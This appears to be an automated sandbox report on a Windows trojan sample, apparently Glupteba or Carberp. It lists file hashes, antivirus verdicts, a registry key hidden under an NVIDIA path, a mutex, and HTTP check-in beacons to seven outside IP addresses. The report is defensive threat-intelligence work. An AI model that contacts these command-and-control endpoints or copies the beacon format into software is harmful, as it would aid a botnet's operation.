Analysis Date: 2015-05-11 16:37:50
MD5: 2339db7de9482be9b58204f7b7262873
SHA1: 4181ec822050d53acd2fa37c54edbe266a3aef73

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text:  md5: 335cfd9cf05a312e95f621aa515fe844  sha1: bf7e296ff67629cce8b69efa77d65295156ccbc1  size: 94208
Section .rdata: md5: 9f2701954cef5874fe21c5337b04ba12  sha1: 0e192772e0da1db20f90348161fb5aa62c18d126  size: 20480
Section .data:  md5: dcfa3cbb7cb3c635a6b835088ea7127a  sha1: fc2a2bb8e7b1a4a51e29da7455f05a22416263e9  size: 8192
Section .rsrc:  md5: a5c41bd3188f5f4857cfdb839b98506c  sha1: 368b614f69237e5b2276cedc68f475abf5a9314e  size: 8192
Timestamp: 2015-01-28 14:00:29
Packer: Microsoft Visual C++ v6.0
PEhash: 7a335b37c5817e6994115330c251e34fb78ef13c
IMPhash: 61393783fe9a02b35d53a3f3962f7160

AV detections (vendor: verdict):
AV Ad-Aware: Trojan.GenericKD.2126051
AV Alwil (avast): Agent-AVKG [Trj]
AV Arcabit (arcavir): Trojan.GenericKD.2126051
AV Authentium: W32/Trojan.YCXZ-1974
AV Avira (antivir): TR/Crypt.ZPACK.123655
AV BitDefender: Trojan.GenericKD.2126051
AV BullGuard: Trojan.GenericKD.2126051
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Carberp.r4
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoad3.35231
AV Emsisoft: Trojan.GenericKD.2126051
AV Eset (nod32): Win32/Glupteba.M
AV Fortinet: W32/Glupteba.M!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Trojan.GenericKD.2126051
AV Grisoft (avg): Small.GVU
AV Ikarus: Trojan.Win32.Glupteba
AV K7: Trojan ( 00286e241 )
AV Kaspersky: no_virus
AV MalwareBytes: Trojan.Agent
AV Mcafee: RDN/Generic.tfr!eh
AV Microsoft Security Essentials: Trojan:Win32/Carberp.I
AV MicroWorld (escan): Trojan.GenericKD.2126051
AV Padvish: no_virus
AV Rising: no_virus
AV Sophos: Troj/Glupteba-F
AV Symantec: Trojan.Gen
AV Trend Micro: no_virus
AV Twister: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝ 15150124\\x00
Creates File: \Device\Afd\Endpoint
Creates Mutex: Global\MD7H82HHF7EH2D73

Network Details:

HTTP GET: http://222.82.218.14:45570/stat?uid=100&downlink=1111&uplink=1111&id=00016FFB&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
  User-Agent:
HTTP GET: http://71.245.120.18:39394/stat?uid=100&downlink=1111&uplink=1111&id=000183C1&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
  User-Agent:
HTTP GET: http://213.238.168.2:33879/stat?uid=100&downlink=1111&uplink=1111&id=00019759&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
  User-Agent:
HTTP GET: http://46.165.233.149:35173/stat?uid=100&downlink=1111&uplink=1111&id=0001AAF0&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
  User-Agent:
HTTP GET: http://108.163.241.250:31131/stat?uid=100&downlink=1111&uplink=1111&id=0001BE98&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
  User-Agent:
HTTP GET: http://109.104.94.2:11754/stat?uid=100&downlink=1111&uplink=1111&id=0001D23F&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
  User-Agent:
HTTP GET: http://223.165.30.17:36991/stat?uid=100&downlink=1111&uplink=1111&id=0001E5D7&statpass=bpass&version=15150124&features=30&guid=22c1e10e-11ff-484f-91b9-40b16a89ea4c&comment=15150124&p=0&s=
  User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 222.82.218.14:45570
Flows TCP: 192.168.1.1:1032 ➝ 71.245.120.18:39394
Flows TCP: 192.168.1.1:1033 ➝ 213.238.168.2:33879
Flows TCP: 192.168.1.1:1034 ➝ 46.165.233.149:35173
Flows TCP: 192.168.1.1:1035 ➝ 108.163.241.250:31131
Flows TCP: 192.168.1.1:1036 ➝ 109.104.94.2:11754
Flows TCP: 192.168.1.1:1037 ➝ 223.165.30.17:36991

Raw Pcap

Strings
